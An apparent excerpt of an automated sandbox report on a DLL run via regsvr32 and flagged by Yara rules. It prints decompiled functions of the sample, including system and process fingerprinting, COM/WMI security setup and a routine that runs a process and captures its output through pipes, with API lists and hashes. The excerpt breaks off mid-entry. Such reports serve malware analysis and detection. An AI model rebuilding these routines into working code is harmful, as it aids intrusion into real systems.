                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                            • API String ID: 667068680-129414566
                            • Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                            • Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
                            • Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                            • Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                            				signed int _t12;
                            				signed int _t13;
                            				int _t15;
                            				char* _t24;
                            				char* _t26;
                            				char* _t28;
                            				char* _t29;
                            				signed int _t40;
                            				char* _t43;
                            				char* _t45;
                            				long long* _t47;
                            
                            				_t12 = _a20;
                            				if(_t12 == 0) {
                            					_t12 = 0x11;
                            				}
                            				_t26 = _a4;
                            				_push(_t30);
                            				 *_t47 = _a12;
                            				_push(_t12);
                            				_push("%.*g");
                            				_push(_a8);
                            				_push(_t26);
                            				L10012285();
                            				_t40 = _t12;
                            				if(_t40 < 0 || _t40 >= _a8) {
                            					L19:
                            					_t13 = _t12 | 0xffffffff;
                            					goto L20;
                            				} else {
                            					L100122CD();
                            					_t15 =  *((intOrPtr*)( *_t12));
                            					if(_t15 != 0x2e) {
                            						_t24 = strchr(_t26, _t15);
                            						if(_t24 != 0) {
                            							 *_t24 = 0x2e;
                            						}
                            					}
                            					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                            						L11:
                            						_t43 = strchr(_t26, 0x65);
                            						_t28 = _t43;
                            						if(_t43 == 0) {
                            							L18:
                            							_t13 = _t40;
                            							L20:
                            							return _t13;
                            						}
                            						_t45 = _t43 + 1;
                            						_t29 = _t28 + 2;
                            						if( *_t45 == 0x2d) {
                            							_t45 = _t29;
                            						}
                            						while( *_t29 == 0x30) {
                            							_t29 = _t29 + 1;
                            						}
                            						if(_t29 != _t45) {
                            							E10008706(_t45, _t29, _t40 - _t29 + _a4);
                            							_t40 = _t40 + _t45 - _t29;
                            						}
                            						goto L18;
                            					} else {
                            						_t6 = _t40 + 3; // 0x100109b2
                            						_t12 = _t6;
                            						if(_t12 >= _a8) {
                            							goto L19;
                            						}
                            						_t26[_t40] = 0x302e;
                            						( &(_t26[2]))[_t40] = 0;
                            						_t40 = _t40 + 2;
                            						goto L11;
                            					}
                            				}
                            			}


                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strchr$_snprintflocaleconv
                            • String ID: %.*g
                            • API String ID: 1910550357-952554281
                            • Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                            • Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
                            • Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                            • Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: _snprintfqsort
                            • String ID: %I64d$false$null$true
                            • API String ID: 756996078-4285102228
                            • Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                            • Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
                            • Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                            • Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                            				char _v516;
                            				void _v1044;
                            				char _v1076;
                            				signed int _v1080;
                            				signed int _v1096;
                            				WCHAR* _v1100;
                            				intOrPtr _v1104;
                            				signed int _v1108;
                            				intOrPtr _v1112;
                            				intOrPtr _v1116;
                            				char _v1144;
                            				char _v1148;
                            				void* __esi;
                            				intOrPtr _t66;
                            				intOrPtr _t73;
                            				signed int _t75;
                            				intOrPtr _t76;
                            				signed int _t81;
                            				WCHAR* _t87;
                            				void* _t89;
                            				signed int _t90;
                            				signed int _t91;
                            				signed int _t93;
                            				signed int _t94;
                            				WCHAR* _t96;
                            				intOrPtr _t106;
                            				intOrPtr _t107;
                            				void* _t108;
                            				intOrPtr _t109;
                            				signed char _t116;
                            				WCHAR* _t118;
                            				void* _t122;
                            				signed int _t123;
                            				intOrPtr _t125;
                            				void* _t128;
                            				void* _t129;
                            				WCHAR* _t130;
                            				void* _t134;
                            				void* _t141;
                            				void* _t143;
                            				WCHAR* _t145;
                            				signed int _t153;
                            				void* _t154;
                            				void* _t178;
                            				signed int _t180;
                            				void* _t181;
                            				void* _t183;
                            				void* _t187;
                            				signed int _t188;
                            				WCHAR* _t190;
                            				signed int _t191;
                            				signed int _t192;
                            				intOrPtr* _t194;
                            				signed int _t196;
                            				void* _t199;
                            				void* _t200;
                            				void* _t201;
                            				void* _t202;
                            				intOrPtr* _t203;
                            				void* _t208;
                            
                            				_t208 = __fp0;
                            				_push(_t191);
                            				_t128 = __edx;
                            				_t187 = __ecx;
                            				_t192 = _t191 | 0xffffffff;
                            				memset( &_v1044, 0, 0x20c);
                            				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                            				_v1108 = 1;
                            				if(_t187 != 0) {
                            					_t123 =  *0x1001e688; // 0x1930590
                            					_t125 =  *0x1001e68c; // 0x19afc68
                            					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                            				}
                            				if(E1000BB8D(_t187) != 0) {
                            					L4:
                            					_t134 = _t128;
                            					_t66 = E1000B7A8(_t134,  &_v516);
                            					_push(_t134);
                            					_v1104 = _t66;
                            					E1000B67D(_t66,  &_v1076, _t206, _t208);
                            					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
                            					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
                            					E1000B88A(_t141,  &_v1100, _t208);
                            					_t175 =  &_v1076;
                            					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
                            					_v1112 = _t73;
                            					_t143 = _t141;
                            					if(_t73 != 0) {
                            						_push(0);
                            						_push(_t129);
                            						_push("\\");
                            						_t130 = E100092E5(_t73);
                            						_t200 = _t199 + 0x10;
                            						_t75 =  *0x1001e688; // 0x1930590
                            						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                            						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                            							L12:
                            							__eflags = _v1108;
                            							if(__eflags != 0) {
                            								_t76 = E100091E3(_v1112);
                            								_t145 = _t130;
                            								 *0x1001e740 = _t76;
                            								 *0x1001e738 = E100091E3(_t145);
                            								L17:
                            								_push(_t145);
                            								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
                            								_t201 = _t200 + 0x10;
                            								__eflags = _t188;
                            								if(_t188 == 0) {
                            									goto L41;
                            								}
                            								_push(0x1001b9ca);
                            								E10009F48(0xe);
                            								E10009F6C(_t188, _t208, _t130);
                            								_t194 = _a4;
                            								_v1096 = _v1096 & 0x00000000;
                            								_push(2);
                            								_v1100 =  *_t194;
                            								_push(8);
                            								_push( &_v1100);
                            								_t178 = 0xb;
                            								E1000A0AB(_t188, _t178, _t208);
                            								_t179 =  *(_t194 + 0x10);
                            								_t202 = _t201 + 0xc;
                            								__eflags =  *(_t194 + 0x10);
                            								if( *(_t194 + 0x10) != 0) {
                            									E1000A3ED(_t188, _t179, _t208);
                            								}
                            								_t180 =  *(_t194 + 0xc);
                            								__eflags = _t180;
                            								if(_t180 != 0) {
                            									E1000A3ED(_t188, _t180, _t208);
                            								}
                            								_t87 = E1000980C(0);
                            								_push(2);
                            								_v1100 = _t87;
                            								_t153 = _t188;
                            								_push(8);
                            								_v1096 = _t180;
                            								_push( &_v1100);
                            								_t181 = 2;
                            								_t89 = E1000A0AB(_t153, _t181, _t208);
                            								_t203 = _t202 + 0xc;
                            								__eflags = _v1108;
                            								if(_v1108 == 0) {
                            									_t153 =  *0x1001e688; // 0x1930590
                            									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                            									if(__eflags != 0) {
                            										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
                            										_t203 = _t203 + 0xc;
                            										goto L26;
                            									}
                            									_t153 = _t153 + 0x228;
                            									goto L25;
                            								} else {
                            									_t91 =  *0x1001e688; // 0x1930590
                            									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                            									if(__eflags != 0) {
                            										L32:
                            										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                            										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                            											_t183 = 0x64;
                            											E1000E23E(_t183);
                            										}
                            										E100052C0( &_v1076, _t208);
                            										_t190 = _a8;
                            										_t154 = _t153;
                            										__eflags = _t190;
                            										if(_t190 != 0) {
                            											_t94 =  *0x1001e688; // 0x1930590
                            											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                            											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                            												lstrcpyW(_t190, _t130);
                            											} else {
                            												_t96 = E1000109A(_t154, 0x228);
                            												_v1100 = _t96;
                            												lstrcpyW(_t190, _t96);
                            												E100085D5( &_v1100);
                            												 *_t203 = "\"";
                            												lstrcatW(_t190, ??);
                            												lstrcatW(_t190, _t130);
                            												lstrcatW(_t190, "\"");
                            											}
                            										}
                            										_t93 = _a12;
                            										__eflags = _t93;
                            										if(_t93 != 0) {
                            											 *_t93 = _v1104;
                            										}
                            										_t192 = 0;
                            										__eflags = 0;
                            										goto L41;
                            									}
                            									_t51 = _t91 + 0x228; // 0x19307b8
                            									_t153 = _t51;
                            									L25:
                            									_t90 = E1000553F(_t153, _t130, __eflags);
                            									L26:
                            									__eflags = _t90;
                            									if(_t90 >= 0) {
                            										_t91 =  *0x1001e688; // 0x1930590
                            										goto L32;
                            									}
                            									_push(0xfffffffd);
                            									L6:
                            									_pop(_t192);
                            									goto L41;
                            								}
                            							}
                            							_t106 = E1000C292(_v1104, __eflags);
                            							_v1112 = _t106;
                            							_t107 =  *0x1001e684; // 0x19afaa0
                            							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                            							__eflags = _t108 - _t192;
                            							if(_t108 != _t192) {
                            								_t109 =  *0x1001e684; // 0x19afaa0
                            								 *((intOrPtr*)(_t109 + 0x30))();
                            								E1000861A( &_v1148, _t192);
                            								_t145 = _t108;
                            								goto L17;
                            							}
                            							E1000861A( &_v1144, _t192);
                            							_t81 = 1;
                            							goto L42;
                            						}
                            						_t116 =  *(_t75 + 0x1898);
                            						__eflags = _t116 & 0x00000004;
                            						if((_t116 & 0x00000004) == 0) {
                            							__eflags = _t116;
                            							if(_t116 != 0) {
                            								goto L12;
                            							}
                            							L11:
                            							E1000E286(_v1112, _t175);
                            							goto L12;
                            						}
                            						_v1080 = _v1080 & 0x00000000;
                            						_t118 = E100095E1(_t143, 0x879);
                            						_v1100 = _t118;
                            						_t175 = _t118;
                            						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                            						E100085D5( &_v1100);
                            						_t200 = _t200 + 0x14;
                            						goto L11;
                            					}
                            					_push(0xfffffffe);
                            					goto L6;
                            				} else {
                            					_t122 = E10002BA4( &_v1044, _t192, 0x105);
                            					_t206 = _t122;
                            					if(_t122 == 0) {
                            						L41:
                            						_t81 = _t192;
                            						L42:
                            						return _t81;
                            					}
                            					goto L4;
                            				}
                            			}
































































                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset
                            • String ID:
                            • API String ID: 1985475764-0
                            • Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                            • Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
                            • Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                            • Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(00000000), ref: 1000D75C
                            • SysAllocString.OLEAUT32(?), ref: 1000D764
                            • SysAllocString.OLEAUT32(00000000), ref: 1000D778
                            • SysFreeString.OLEAUT32(?), ref: 1000D7F3
                            • SysFreeString.OLEAUT32(?), ref: 1000D7F6
                            • SysFreeString.OLEAUT32(?), ref: 1000D7FB
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                            • Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
                            • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                            • Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: @$\u%04X$\u%04X\u%04X
                            • API String ID: 0-2132903582
                            • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                            • Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
                            • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                            • Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 30%
                            			E1000D523(void* __ecx) {
                            				char _v8;
                            				void* _v12;
                            				char* _t15;
                            				intOrPtr* _t16;
                            				void* _t21;
                            				intOrPtr* _t23;
                            				intOrPtr* _t24;
                            				intOrPtr* _t25;
                            				void* _t30;
                            				void* _t33;
                            
                            				_v12 = 0;
                            				_v8 = 0;
                            				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                            				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                            				_t15 =  &_v12;
                            				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
                            				if(_t15 < 0) {
                            					L5:
                            					_t23 = _v8;
                            					if(_t23 != 0) {
                            						 *((intOrPtr*)( *_t23 + 8))(_t23);
                            					}
                            					_t24 = _v12;
                            					if(_t24 != 0) {
                            						 *((intOrPtr*)( *_t24 + 8))(_t24);
                            					}
                            					_t16 = 0;
                            				} else {
                            					__imp__#2(__ecx);
                            					_t25 = _v12;
                            					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                            					if(_t21 < 0) {
                            						goto L5;
                            					} else {
                            						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                            						if(_t21 < 0) {
                            							goto L5;
                            						} else {
                            							_t16 = E10008604(8);
                            							if(_t16 == 0) {
                            								goto L5;
                            							} else {
                            								 *((intOrPtr*)(_t16 + 4)) = _v12;
                            								 *_t16 = _v8;
                            							}
                            						}
                            					}
                            				}
                            				return _t16;
                            			}














                            APIs
                            • CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                            • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                            • SysAllocString.OLEAUT32(00000000), ref: 1000D569
                            • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
                            • String ID:
                            • API String ID: 2855449287-0
                            • Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                            • Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
                            • Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                            • Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E100121FF(char* __eax, char** _a4, long long* _a8) {
                            				char* _v8;
                            				long long _v16;
                            				char* _t9;
                            				signed char _t11;
                            				char** _t19;
                            				char _t22;
                            				long long _t32;
                            				long long _t33;
                            
                            				_t9 = __eax;
                            				L100122CD();
                            				_t19 = _a4;
                            				_t22 =  *__eax;
                            				if( *_t22 != 0x2e) {
                            					_t9 = strchr( *_t19, 0x2e);
                            					if(_t9 != 0) {
                            						 *_t9 =  *_t22;
                            					}
                            				}
                            				L10012291();
                            				 *_t9 =  *_t9 & 0x00000000;
                            				_t11 = strtod( *_t19,  &_v8);
                            				asm("fst qword [ebp-0xc]");
                            				_t32 =  *0x10018250;
                            				asm("fucomp st1");
                            				asm("fnstsw ax");
                            				if((_t11 & 0x00000044) != 0) {
                            					L5:
                            					st0 = _t32;
                            					L10012291();
                            					if( *_t11 != 0x22) {
                            						_t33 = _v16;
                            						goto L8;
                            					} else {
                            						return _t11 | 0xffffffff;
                            					}
                            				} else {
                            					_t33 =  *0x10018258;
                            					asm("fucomp st1");
                            					asm("fnstsw ax");
                            					if((_t11 & 0x00000044) != 0) {
                            						L8:
                            						 *_a8 = _t33;
                            						return 0;
                            					} else {
                            						goto L5;
                            					}
                            				}
                            			}












                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: _errno$localeconvstrchrstrtod
                            • String ID:
                            • API String ID: 1035490122-0
                            • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                            • Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
                            • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                            • Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E1000CF84(void* __ecx) {
                            				intOrPtr _t11;
                            				long _t12;
                            				intOrPtr _t17;
                            				intOrPtr _t18;
                            				struct _OSVERSIONINFOA* _t29;
                            
                            				_push(__ecx);
                            				_t29 =  *0x1001e688; // 0x1930590
                            				GetCurrentProcess();
                            				_t11 = E1000BA05();
                            				_t1 = _t29 + 0x1644; // 0x1931bd4
                            				_t25 = _t1;
                            				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                            				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                            				_t33 = _t12;
                            				if(_t12 != 0) {
                            					_t12 = E10008FBE(_t25, _t33);
                            				}
                            				_t3 = _t29 + 0x228; // 0x19307b8
                            				 *(_t29 + 0x1854) = _t12;
                            				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
                            				memset(_t29, 0, 0x9c);
                            				_t29->dwOSVersionInfoSize = 0x9c;
                            				GetVersionExA(_t29);
                            				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                            				_t17 = E1000E3B6(_t3);
                            				_t7 = _t29 + 0x220; // 0x19307b0
                            				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                            				_t18 = E1000E3F1(_t7);
                            				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                            				return _t18;
                            			}









                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,01930590,?,10003545), ref: 1000CF90
                            • GetModuleFileNameW.KERNEL32(00000000,01931BD4,00000105,?,?,01930590,?,10003545), ref: 1000CFB1
                            • memset.MSVCRT ref: 1000CFE2
                            • GetVersionExA.KERNEL32(01930590,01930590,?,10003545), ref: 1000CFED
                            • GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$FileModuleNameVersionmemset
                            • String ID:
                            • API String ID: 3581039275-0
                            • Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                            • Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
                            • Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                            • Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E1000A9B7(signed int __ecx) {
                            				void* _v8;
                            				void* _v12;
                            				void* _v16;
                            				void* _v20;
                            				signed int _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				struct _SECURITY_ATTRIBUTES _v48;
                            				intOrPtr _v60;
                            				char _v64;
                            				intOrPtr _v76;
                            				intOrPtr _v80;
                            				void* _v84;
                            				short _v92;
                            				intOrPtr _v96;
                            				void _v140;
                            				intOrPtr _t77;
                            				void* _t79;
                            				intOrPtr _t85;
                            				intOrPtr _t87;
                            				intOrPtr _t89;
                            				intOrPtr _t92;
                            				intOrPtr _t98;
                            				intOrPtr _t100;
                            				intOrPtr _t102;
                            				long _t111;
                            				intOrPtr _t115;
                            				intOrPtr _t126;
                            				void* _t127;
                            				void* _t128;
                            				void* _t129;
                            				void* _t130;
                            
                            				_t111 = 0;
                            				_v24 = __ecx;
                            				_v12 = 0;
                            				_v20 = 0;
                            				_t127 = 0;
                            				_v8 = 0;
                            				_v16 = 0;
                            				_v48.nLength = 0xc;
                            				_v48.lpSecurityDescriptor = 0;
                            				_v48.bInheritHandle = 1;
                            				_v28 = 0;
                            				memset( &_v140, 0, 0x44);
                            				asm("stosd");
                            				_t130 = _t129 + 0xc;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                            					L18:
                            					return 0;
                            				}
                            				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                            					L13:
                            					E1000861A( &_v28, 0);
                            					if(_v20 != 0) {
                            						_t77 =  *0x1001e684; // 0x19afaa0
                            						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                            					}
                            					if(_v8 != 0) {
                            						_t115 =  *0x1001e684; // 0x19afaa0
                            						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                            					}
                            					return _t111;
                            				}
                            				_t79 = _v16;
                            				_v76 = _t79;
                            				_v80 = _t79;
                            				_v84 = _v12;
                            				_v140 = 0x44;
                            				_v96 = 0x101;
                            				_v92 = 0;
                            				_t126 = E10008604(0x1001);
                            				_v28 = _t126;
                            				if(_t126 == 0) {
                            					goto L18;
                            				}
                            				_push( &_v64);
                            				_push( &_v140);
                            				_t85 =  *0x1001e684; // 0x19afaa0
                            				_push(0);
                            				_push(0);
                            				_push(0x8000000);
                            				_push(1);
                            				_push(0);
                            				_push(0);
                            				_push(_v24);
                            				_push(0);
                            				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                            					goto L13;
                            				}
                            				_t87 =  *0x1001e684; // 0x19afaa0
                            				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                            				_t89 =  *0x1001e684; // 0x19afaa0
                            				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                            				_v24 = _v24 & 0;
                            				do {
                            					_t92 =  *0x1001e684; // 0x19afaa0
                            					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                            					 *((char*)(_v24 + _t126)) = 0;
                            					if(_t111 == 0) {
                            						_t127 = E100091A6(_t126, 0);
                            					} else {
                            						_push(0);
                            						_push(_t126);
                            						_v32 = _t127;
                            						_t127 = E10009292(_t127);
                            						E1000861A( &_v32, 0xffffffff);
                            						_t130 = _t130 + 0x14;
                            					}
                            					_t111 = _t127;
                            					_v32 = _t127;
                            				} while (_v36 != 0);
                            				_push( &_v36);
                            				_push(E1000C379(_t127));
                            				_t98 =  *0x1001e68c; // 0x19afc68
                            				_push(_t127);
                            				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                            					L12:
                            					_t100 =  *0x1001e684; // 0x19afaa0
                            					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                            					_t102 =  *0x1001e684; // 0x19afaa0
                            					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                            					goto L13;
                            				}
                            				_t128 = E10009256(_t127);
                            				if(_t128 == 0) {
                            					goto L12;
                            				}
                            				E1000861A( &_v32, 0);
                            				return _t128;
                            			}

                            APIs
                            • memset.MSVCRT ref: 1000A9F4
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
                            • CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                              • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeapPipe$AllocFreememset
                            • String ID: D
                            • API String ID: 488076629-2746444292
                            • Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                            • Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
